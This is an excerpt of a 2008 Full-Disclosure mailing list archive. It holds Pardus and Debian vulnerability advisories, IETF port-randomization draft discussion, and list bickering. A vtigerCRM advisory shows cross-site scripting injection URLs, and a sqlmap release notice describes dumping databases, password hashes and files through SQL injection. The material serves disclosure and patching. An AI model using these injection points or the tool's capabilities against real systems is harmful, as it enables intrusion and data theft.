From pinar at pardus.org.tr Mon Sep 1 02:14:09 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Mon, 01 Sep 2008 04:14:09 +0300 Subject: [Full-disclosure] [PLSA 2008-34] GNU ed: Heap Overflow Message-ID: <48BB41E1.90300@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-34 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-01 Severity: 2 Type: Remote ------------------------------------------------------------------------ Summary ======= A vulnerability was reported in GNU ed. A remote user can cause arbitrary code to be executed on the target user's system. Description =========== A remote user can create a specially crafted file that, when processed by the target user, will trigger a heap overflow and potentially execute arbitrary code on the target system. The code will run with the privileges of the target user. The vulnerability resides in strip_escapes() in signal.c. Note: This vulnerability found by Alfredo Ortega from Core Security Technologies. Affected packages: Pardus 2008: ed, all before 1.0-9-2 Pardus 2007: ed, all before 1.0-7-8 Resolution ========== There are update(s) for ed. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up ed Pardus 2007: pisi up ed References ========== * http://bugs.pardus.org.tr/show_bug.cgi?id=8092 * http://www.securitytracker.com/alerts/2008/Aug/1020734.html * http://lists.gnu.org/archive/html/bug-ed/2008-06/msg00000.html ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From pinar at pardus.org.tr Mon Sep 1 02:22:30 2008 From: pinar at pardus.org.tr (=?UTF-8?B?UMSxbmFyIFlhbmFyZGHEnw==?=) Date: Mon, 01 Sep 2008 04:22:30 +0300 Subject: [Full-disclosure] [PLSA 2008-35] Ruby: Denial of Service Message-ID: <48BB43D6.9090207@pardus.org.tr> ------------------------------------------------------------------------ Pardus Linux Security Advisory 2008-35 security at pardus.org.tr ------------------------------------------------------------------------ Date: 2008-09-01 Severity: 3 Type: Remote ------------------------------------------------------------------------ Summary ======= A vulnerability has been reported in Ruby, which can be exploited by malicious people to cause a DoS (Denial of Service). Description =========== The vulnerability is caused due to an error in the REXML library when processing recursively nested XML entities. This can be exploited to cause a DoS via a specially crafted XML document. Note: This vulnerability found by Luka Treiber and Mitja Kolsek of ACROS Security. Affected packages: Pardus 2008: ruby, all before 1.8.7_p72-17-5 ruby-mode, all before 1.8.7_p72-17-5 Pardus 2007: ruby, all before 1.8.7_p72-17-14 ruby-mode, all before 1.8.7_p72-17-5 Resolution ========== There are update(s) for ruby, ruby-mode. You can update them via Package Manager or with a single command from console: Pardus 2008: pisi up ruby ruby-mode Pardus 2007: pisi up ruby ruby-mode References ========== * http://security.pardus.org.tr/en/2008-35 * http://bugs.pardus.org.tr/show_bug.cgi?id=8044 * http://www.ruby-lang.org/en/news/2008/08/23/dos-vulnerability-in-rexml/ * http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3790 * http://secunia.com/advisories/31602 ------------------------------------------------------------------------ -- P?nar Yanarda? Pardus Security Team http://security.pardus.org.tr From exibar at thelair.com Mon Sep 1 03:39:31 2008 From: exibar at thelair.com (Exibar) Date: Sun, 31 Aug 2008 22:39:31 -0400 Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> Message-ID: <20080901024139.AA819304@lists.grok.org.uk> This coming from the guy who basically insults everyone on the list at any chance he gets... C'mon, you really are n3td3v right.....? Exibar -----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Professor Micheal Chatner Sent: Sunday, August 31, 2008 5:20 PM To: full-disclosure at lists.grok.org.uk Subject: [inbox] [Full-disclosure] Monthly Hands-On Meetups Hey Guys, I was wondering if anyone would like to start something like a Full-Disclosure monthly group in cities all over the world. It could be like 2600 meetings except with real security professionals because personally I don't want to even talk to someone unless they have a CEH cert. I just started a new job in digital forensics. It would be fun to meet other people who like hacking and trading Ubuntu tips and tricks! Let me know what you think! Professor Micheal Chatner, M.D., CISSP _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ From Valdis.Kletnieks at vt.edu Mon Sep 1 04:55:56 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Sun, 31 Aug 2008 23:55:56 -0400 Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups In-Reply-To: Your message of "Sun, 31 Aug 2008 22:39:31 EDT." <20080901024139.AA819304@lists.grok.org.uk> References: <20080901024139.AA819304@lists.grok.org.uk> Message-ID: <6089.1220241356@turing-police.cc.vt.edu> On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said: > This coming from the guy who basically insults everyone on the list at any > chance he gets... > > C'mon, you really are n3td3v right.....? The phrase "I just started a new job in digital forensics." would tend to indicate otherwise... -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080831/05353223/attachment.bin From smenard at nbnet.nb.ca Mon Sep 1 04:07:48 2008 From: smenard at nbnet.nb.ca (Stephen Menard) Date: Mon, 01 Sep 2008 00:07:48 -0300 Subject: [Full-disclosure] Monthly Hands-On Meetups In-Reply-To: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> References: <782434a70808311419r7f352b05kaf38c2fdb0ae6306@mail.gmail.com> Message-ID: <48BB5C84.4070105@nbnet.nb.ca> Professor Micheal Chatner wrote: > I just started a new job in digital forensics. It would be fun to meet > other people who like hacking and trading Ubuntu tips and tricks! > oh aren't you top of the class > Let me know what you think! > Professor Micheal Chatner, M.D., CISSP > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > From fernando.gont at gmail.com Mon Sep 1 06:44:35 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Mon, 01 Sep 2008 02:44:35 -0300 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft Message-ID: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Folks, We have published a revision of our IETF Internet-Draft about port randomization. It is available at: http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-rand omization-02.txt (you can find the document in other fancy formats at: http://www.gont.com.ar/drafts/port-randomization/index.html) This new revision of the document addresses the feedback we got from Amit Klein, Matthias Bethke, and Alfred Hoenes. The abstract of the document is: - ---- cut here ---- Recently, awareness has been raised about a number of "blind" attacks that can be performed against the Transmission Control Protocol (TCP) and similar protocols. The consequences of these attacks range from throughput-reduction to broken connections or data corruption. These attacks rely on the attacker's ability to guess or know the five- tuple (Protocol, Source Address, Destination Address, Source Port, Destination Port) that identifies the transport protocol instance to be attacked. This document describes a number of simple and efficient methods for the random selection of the client port number, such that the possibility of an attacker guessing the exact value is reduced. While this is not a replacement for cryptographic methods, the described port number randomization algorithms provide improved security/obfuscation with very little effort and without any key management overhead. The algorithms described in this document are local policies that may be incrementally deployed, and that do not violate the specifications of any of the transport protocols that may benefit from them, such as TCP, UDP, UDP-lite, SCTP, DCCP, and RTP. - ---- cut here ---- Any comments will be more than welcome. Thanks! Kind regards, - -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) - not licensed for commercial use: www.pgp.com wsBVAwUBSLqZM5buqe/Qdv/xAQinYggA0q0ko/QOu4UBCYT8pVGrLL6N1sWJimOz wdVFXYcMyGiwxX4zb9ozqMmfnGHxsHSLJ9PMcA8BR9ToKgJ/ZwuVYFTMYj9WvyuP ZcXHr/e1R1JT4AJS305RGOwH+oZPk6szdn0im4Ax8yCFJnJRtD0Hc7IWDIomO93R jwfC2E1G4ElE343RX/mFjf2kzmjUOaoiM8MHxq9NZZRfliJbAdkDovtb3XKgiiU4 uFF+UEcC8Vkg/ISo9X5dlqJf4N3ogHaomfsaP8g5JZ6tP4kMZ1lmRvF8L2MAw0b4 wSyVp9yA4+vJ0w24bVDs/BPlicXUblUPZdmoKwzMCJck8AuvqL0c9A== =xta0 -----END PGP SIGNATURE----- -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From exibar at thelair.com Mon Sep 1 06:53:16 2008 From: exibar at thelair.com (Exibar) Date: Mon, 1 Sep 2008 01:53:16 -0400 Subject: [Full-disclosure] [inbox] Monthly Hands-On Meetups In-Reply-To: <6089.1220241356@turing-police.cc.vt.edu> Message-ID: <20080901061103.3533D337@lists.grok.org.uk> hehe, true, but n3td3v basically claims to be the foremost security person in the world... Maybe he bought EnCase and thinks he's starting a new business... Exibar -----Original Message----- From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu] Sent: Sunday, August 31, 2008 11:56 PM To: Exibar Cc: 'Professor Micheal Chatner'; full-disclosure at lists.grok.org.uk Subject: Re: [Full-disclosure] [inbox] Monthly Hands-On Meetups On Sun, 31 Aug 2008 22:39:31 EDT, Exibar said: > This coming from the guy who basically insults everyone on the list at any > chance he gets... > > C'mon, you really are n3td3v right.....? The phrase "I just started a new job in digital forensics." would tend to indicate otherwise... From fernando.gont at gmail.com Mon Sep 1 07:51:53 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Mon, 01 Sep 2008 03:51:53 -0300 Subject: [Full-disclosure] New IETF I-D-: Security Assessment of the Internet Protocol version 4 Message-ID: <48bb9215.08045a0a.324d.390b@mx.google.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Hello, folks, We have published an IETF Internet-Draft entitled "Security Assessment of the Internet Protocol version 4", which is heavily based on the "Security Assessment of the Internet Protocol" that was recently released by the UK CPNI (http://www.cpni.gov.uk/Products/technicalnotes/3677.aspx). The IETF I-D is available at: http://www.gont.com.ar/drafts/ip-security/index.html (and is also available at the IETF internet-drafts repository) Our IETF I-D is an effort to take the results of the IP security assessment to the IETF, so that all the identified issues get documented in an official IETF document, and hopefully the IETF standards are modified as necessary. Any feedback on the IETF I-D and/or the original UK CPNI document will be more than welcome. Thanks! Kind regards, Fernando Gont -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.5.3 (Build 5003) - not licensed for commercial use: www.pgp.com wsBVAwUBSLuQ+5buqe/Qdv/xAQigBAf7BEKquCyCFS4gkVWoydMMD2jg9Hd0GkHr Ygeh3tpcL26yCetskCo+OE098LXMEn8jLiudY3LhW6VLJ02AfxxZh0M0ONT6Aala 2G0mUR0A2COF7W/xWMtWLEAfxZLeE0Uf53tJ/mpwIeewiJfdD8Vyzbq8SIuGa/A/ qCZtFMXAJWw71roXSd91WBKKP5k1Sk2yvwHDLDHoe2FSsu/Y79vO+OW94fmFn84F HLN+WXEdLNZfeJZzSEm48hKYuHYKc6j/X95Il4K4Ev/+9nX3ta602uilOkfIAQYr XwMJnDDOMe1RF0k0gwndtDz8Dgii+LlmBWnVnLJp7+lZhIkDjtUPUA== =Xvbl -----END PGP SIGNATURE----- -- Fernando Gont e-mail: fernando at gont.com.ar || fgont at acm.org PGP Fingerprint: 7809 84F5 322E 45C7 F1C9 3945 96EE A9EF D076 FFF1 From james at djavul.furryhelix.webhop.org Mon Sep 1 09:30:02 2008 From: james at djavul.furryhelix.webhop.org (james at djavul.furryhelix.webhop.org) Date: Mon, 1 Sep 2008 09:30:02 +0100 Subject: [Full-disclosure] everyone who quotes large amounts of text. In-Reply-To: References: Message-ID: <20080901083002.GA30894@djavul.furryhelix.webhop.org> Thedjatclubrock wrote: > *snip vast quote here* > lame... Just using this as an example, but could we please trim quotes please? And it would be appreciated if people didn't quote pages and pages of junk, then just add a one line comment underneath. I can't be the only one who this annoys, can I? From fabian at datensalat.eu Mon Sep 1 10:24:01 2008 From: fabian at datensalat.eu (Fabian Fingerle) Date: Mon, 1 Sep 2008 11:24:01 +0200 Subject: [Full-disclosure] Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 Message-ID: <20080901112401.4a51701a@mobile.fabian.datensalat.eu> Multiple Cross Site Scripting (XSS) Vulnerabilities in vtigerCRM 5.0.4, CVE-2008-3101 References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3101 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3101 http://www.vtiger.de/ Description vtigerCRM is a Open Source Customer Relationship Management (CRM) Software. The application is vulnerable to simple Cross Site Scripting, which can be used for several isues Example Assuming vtigerCRM is installed on http://localhost/vtigercrm/, one can inject JavaScript with: http://localhost/vtigercrm/index.php?module=Products&action=index&parenttab="> http://localhost/vtigercrm/index.php?module=Users&action=Authenticate&user_password="> http://localhost/vtigercrm/index.php?module=Home&action=UnifiedSearch&query_string="> Workaround/Fix vtiger CRM Security Patch for 5.0.4 [1] Disclosure Timeline 2008-07-28 Vendor contacted 2008-07-28 Vendor fixed issue in test environment 2008-07-30 Vender released patch 2008-07-30 Vendor dev statet they'll release a second patch within days 2008-09-01 published advisory, no second patch from upstream yet CVE Information The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-3101 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. Credits and copyright This vulnerability was discovered by Fabian Fingerle [2] (published with help from Hanno Boeck [3]). It's licensed under the creative commons attribution license [4]. Fabian Fingerle, 2008-09-01 [1] http://www.vtiger.de/vtiger-crm/downloads/patches.html?tx_abdownloads_pi1[action]=getviewdetailsfordownload&tx_abdownloads_pi1[uid]=128&tx_abdownloads_pi1[category_uid]=5&cHash=e16be773a5 [2] http://www.fabian-fingerle.de [3] http://www.hboeck.de [4] http://creativecommons.org/licenses/by/3.0/de/ -- _GPG_ 3D17 CAC8 1955 1908 65ED 5C51 FDA3 6A09 AB41 AB85 _chaos events near stuttgart_ www.datensalat.eu -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080901/84716945/attachment.bin From Valdis.Kletnieks at vt.edu Mon Sep 1 10:33:04 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 01 Sep 2008 05:33:04 -0400 Subject: [Full-disclosure] everyone who quotes large amounts of text. In-Reply-To: Your message of "Mon, 01 Sep 2008 09:30:02 BST." <20080901083002.GA30894@djavul.furryhelix.webhop.org> References: <20080901083002.GA30894@djavul.furryhelix.webhop.org> Message-ID: <7555.1220261584@turing-police.cc.vt.edu> On Mon, 01 Sep 2008 09:30:02 BST, james at furryhelix.webhop.org said: > Thedjatclubrock wrote: > > *snip vast quote here* > > lame... > > Just using this as an example, but could we please trim quotes please? > And it would be appreciated if people didn't quote pages and pages of > junk, then just add a one line comment underneath. > I can't be the only one who this annoys, can I? It's almost enough to make you wish the bozos would top-post their one-line comment so you can hit delete as soon as you realize they're a top-posting bozo, rather than making you scroll all the way to the bottom to discover they're a different sort of bozo... ;) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080901/364b1db8/attachment.bin From bernardo.damele at gmail.com Mon Sep 1 14:30:17 2008 From: bernardo.damele at gmail.com (Bernardo Damele A. G.) Date: Mon, 01 Sep 2008 15:30:17 +0200 Subject: [Full-disclosure] [Tool] sqlmap 0.6 released Message-ID: <48BBEE69.9060701@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hi, I am glad to release sqlmap version 0.6. Introduction ============ sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user's specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more. Changes ======= Some of the new features include: * Added multithreading support to set the maximum number of concurrent HTTP requests. * Implemented SQL shell (--sql-shell) functionality and fixed SQL query (--sql-query, before called -e) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack. * Added an option (--privileges) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator. * Added support (-c) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (--save) to save command line options on a configuration file. * Implemented support for HTTPS requests over HTTP(S) proxy. * Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic. Complete list of changes at http://sqlmap.sourceforge.net/doc/ChangeLog. Download ======== You can download it in various formats: * Source gzip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.gz * Source bzip2 compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.tar.bz2 * Source zip compressed, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6.zip * DEB binary package, http://downloads.sourceforge.net/sqlmap/sqlmap_0.6-1_all.deb * RPM binary package, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6-1.noarch.rpm * Portable executable for Windows that does not require the Python interpreter to be installed on the operating system, http://downloads.sourceforge.net/sqlmap/sqlmap-0.6_exe.zip Note: the subversion repository is not accessible anymore so the only way to get the new release is to download it from one of the above links. Documentation ============= * sqlmap user's manual: http://sqlmap.sourceforge.net/doc/README.pdf * sqlmap developer's documentation: http://sqlmap.sourceforge.net/dev/ Happy hacking! - -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile number: +39-3493821385 PGP Key ID: 0x05F5A30F -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFIu+5pdntYwQX1ow8RAjHjAKCq9IJWyiHhgIh5M1oBYrpBGyqnvwCfdNyn 5SR/4ThRFfezNMt24x9WZ+0= =V2iP -----END PGP SIGNATURE----- From fw at deneb.enyo.de Mon Sep 1 19:45:03 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Mon, 01 Sep 2008 20:45:03 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1633-1] New slash packages fix multiple vulnerabilities Message-ID: <87tzczr9hs.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1633-1 security at debian.org http://www.debian.org/security/ Florian Weimer September 01, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : slash Vulnerability : SQL Injection, Cross-Site Scripting Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-2231, CVE-2008-2553 Debian Bug : 484499 It has been discovered that Slash, the Slashdot Like Automated Storytelling Homepage suffers from two vulnerabilities related to insufficient input sanitation, leading to execution of SQL commands (CVE-2008-2231) and cross-site scripting (CVE-2008-2553). For the stable distribution (etch), these problems have been fixed in version 2.2.6-8etch1. In the unstable distribution (sid), the slash package is currently uninstallable and will be removed soon. We recommend that you upgrade your slash package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1.dsc Size/MD5 checksum: 954 70b86d7e0c6f4d70e6ecc1e027739be5 http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6.orig.tar.gz Size/MD5 checksum: 584128 a9886e1e08e47e0db4f3ba3e750102ff http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1.diff.gz Size/MD5 checksum: 21622 2b23a32433e9b168b09ad43e0fd1d160 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_alpha.deb Size/MD5 checksum: 591940 9e38837b0a8f3cc1d3459dacc58c23c6 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_amd64.deb Size/MD5 checksum: 588970 e81e95ed88e082dc56cd10b3770c4360 arm architecture (ARM) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_arm.deb Size/MD5 checksum: 589446 925a97d085854e35f4e9bd678b99454e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_hppa.deb Size/MD5 checksum: 594236 702a6635658253ad1c5c69169174dcfc i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_i386.deb Size/MD5 checksum: 587830 005ed926fe7595e45d2780c37bd6d09f ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_ia64.deb Size/MD5 checksum: 589356 a75d5d65a4499f1d9278df08849959ce mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_mips.deb Size/MD5 checksum: 586112 a2b1336b77de1682ae764c3e05a5950e mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_mipsel.deb Size/MD5 checksum: 587726 25c8ea639b4aa9c924e26ab33e5d59d6 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_powerpc.deb Size/MD5 checksum: 590880 71de67c5a29a3c3122f74570ea090435 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_s390.deb Size/MD5 checksum: 587744 c4809262d63d3449c41e8816b2a8cea1 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/slash/slash_2.2.6-8etch1_sparc.deb Size/MD5 checksum: 588014 8ef8f770f5f22f9473133f382fd7bb18 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJIvDgqAAoJEL97/wQC1SS+zx4H+wURQWes0P5UxmnaggJbnM4C 4bIcxFIphdumrQChejR9eOBvVkDd5dBLmOOFMJpAuMP7QQPWJFIY1cnhprIw27Kj 76VDV6lC19X+wb0c8/vkVbYRaJ7eUB1zooZ0wHgpFgYYmMO/jGysYntmPRq5dWO0 H/buUll72HNWH0OPwp4KS5yP4jnUHqddrJNrqIOyqF5lZJXc5GVTCI1Eun8maLxw fol5MTP5CaJ4mZzaKhDd9ZcnbWyHiE1bNCFdVAnt73aWjG66yQjNfmIJ8d3bYBvX NiudvGKuV3kAQ3pa9QiMTxgcpozkUJt/g0+Y8YvJElPqzSEhBD2ghRMxSIjvLxg= =xUYM -----END PGP SIGNATURE----- From coderman at gmail.com Mon Sep 1 20:41:49 2008 From: coderman at gmail.com (coderman) Date: Mon, 1 Sep 2008 12:41:49 -0700 Subject: [Full-disclosure] everyone who quotes large amounts of text. In-Reply-To: <7555.1220261584@turing-police.cc.vt.edu> References: <20080901083002.GA30894@djavul.furryhelix.webhop.org> <7555.1220261584@turing-police.cc.vt.edu> Message-ID: <4ef5fec60809011241v5985b413m56824e32b7f923b9@mail.gmail.com> On Mon, Sep 1, 2008 at 2:33 AM, wrote: > ... making you scroll all the way to the bottom valdis: this is a known temporal denial of service attack. they can't make you do anything. please update your mental faculties to latest service pack... From coderman at gmail.com Mon Sep 1 20:50:07 2008 From: coderman at gmail.com (coderman) Date: Mon, 1 Sep 2008 12:50:07 -0700 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> Message-ID: <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont wrote: > ... IETF Internet-Draft about port randomization... wget -qO - http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt | grep -i grsec is still empty. why do you dismiss grsec? From Valdis.Kletnieks at vt.edu Mon Sep 1 21:13:18 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 01 Sep 2008 16:13:18 -0400 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: Your message of "Mon, 01 Sep 2008 12:50:07 PDT." <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> Message-ID: <38325.1220299998@turing-police.cc.vt.edu> On Mon, 01 Sep 2008 12:50:07 PDT, coderman said: > On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont wrote: > > ... IETF Internet-Draft about port randomization... > > wget -qO - http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt > | grep -i grsec > > is still empty. why do you dismiss grsec? Because he's writing about the *BASE* system kernel for Linux and the *BSD's. If he included grsec, he'd *also* have to start adding 'NetBSD does this, unless you've applied this patch to your kernel, in which case it does that, or if this other patch was added, making it do this instead...' Or you can get Linus to merge the code in question. See the the helpful info in the file Documentation/SubmittingPatches. You want to send them to the netdev at vger.kernel.org list for review, that's where the network developers hang out. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080901/a1c9ae9e/attachment.bin From rholgstad at gmail.com Mon Sep 1 21:51:35 2008 From: rholgstad at gmail.com (rholgstad) Date: Mon, 01 Sep 2008 15:51:35 -0500 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <38325.1220299998@turing-police.cc.vt.edu> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> Message-ID: <48BC55D7.3010109@gmail.com> Linus doesn't care about security Valdis.Kletnieks at vt.edu wrote: > Or you can get Linus to merge the code in question. See the the helpful info > in the file Documentation/SubmittingPatches. You want to send them to the > netdev at vger.kernel.org list for review, that's where the network developers > hang out. From Valdis.Kletnieks at vt.edu Mon Sep 1 23:23:26 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Mon, 01 Sep 2008 18:23:26 -0400 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: Your message of "Mon, 01 Sep 2008 15:51:35 CDT." <48BC55D7.3010109@gmail.com> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> <38325.1220299998@turing-police.cc.vt.edu> <48BC55D7.3010109@gmail.com> Message-ID: <43513.1220307806@turing-police.cc.vt.edu> On Mon, 01 Sep 2008 15:51:35 CDT, rholgstad said: > Linus doesn't care about security No, he actually *does* care about security - he's just pf the opinion that security fixes don't automatically rate a 'ZOMG! PWNED!' flag on them like certain *BSD variants think. He thinks that sticking a big SECURITY PATCH tag on a fix tends to make people cherry-pick and install just those fixes - even though the patch they *didn't* install that fixes a system crash or a silent data corruption is actually more critical. Your chances of getting it accepted improve greatly if you have a nice writeup of *why* the patch is a good idea - summarize the current state, explain how the new version works, list what attacks it minimizes. Oh - and I *guarantee* that somebody will make a (quite valid) issue about the drain on the /dev/random entropy pool if you're using that as your (possibly indirect) source of random bits. You may want to make sure that you have either Kconfig magic for compile time selection, and/or a /sys file or something for runtime tweaking. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080901/8bf4e5be/attachment.bin From fernando.gont at gmail.com Tue Sep 2 10:06:36 2008 From: fernando.gont at gmail.com (Fernando Gont) Date: Tue, 02 Sep 2008 06:06:36 -0300 Subject: [Full-disclosure] Port Randomization: New revision of our IETF Internet-Draft In-Reply-To: <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.co m> References: <48bb8247.3a17260a.4768.ffff8ccc@mx.google.com> <4ef5fec60809011250g7eddd0a9k56c97a15463fcca1@mail.gmail.com> Message-ID: <48bd038b.1c1d640a.5688.3991@mx.google.com> At 04:50 p.m. 01/09/2008, coderman wrote: >On Sun, Aug 31, 2008 at 10:44 PM, Fernando Gont > wrote: > > ... IETF Internet-Draft about port randomization... > >wget -qO - >http://www.gont.com.ar/drafts/port-randomization/draft-ietf-tsvwg-port-randomization-02.txt >| grep -i grsec > >is still empty. why do you dismiss grsec? Valdis has already answered your question. That said, the document itself is not a survey of what every OS or OS+patch does with respect to ephemeral ports, and that little survey we included is not meant to be complete (for instance, there's no description of what Windows does). Also, the base Linux system already implements Algorithm #3. So I wonder why anybody would patch the Linux ephemeral port selection algorithm.... (unless it is to implement algorithm #4 of our draft). Regarding me "dismissing" grsec, I tried to (but couldn't) get the guy whose e-mail address is available at the grsec web site to review one of the documents I have been working on, so that he could provide his perspective on each of the issues discussed. P.S.: The "survey" section must be about 1% of the document. I'd be glad to 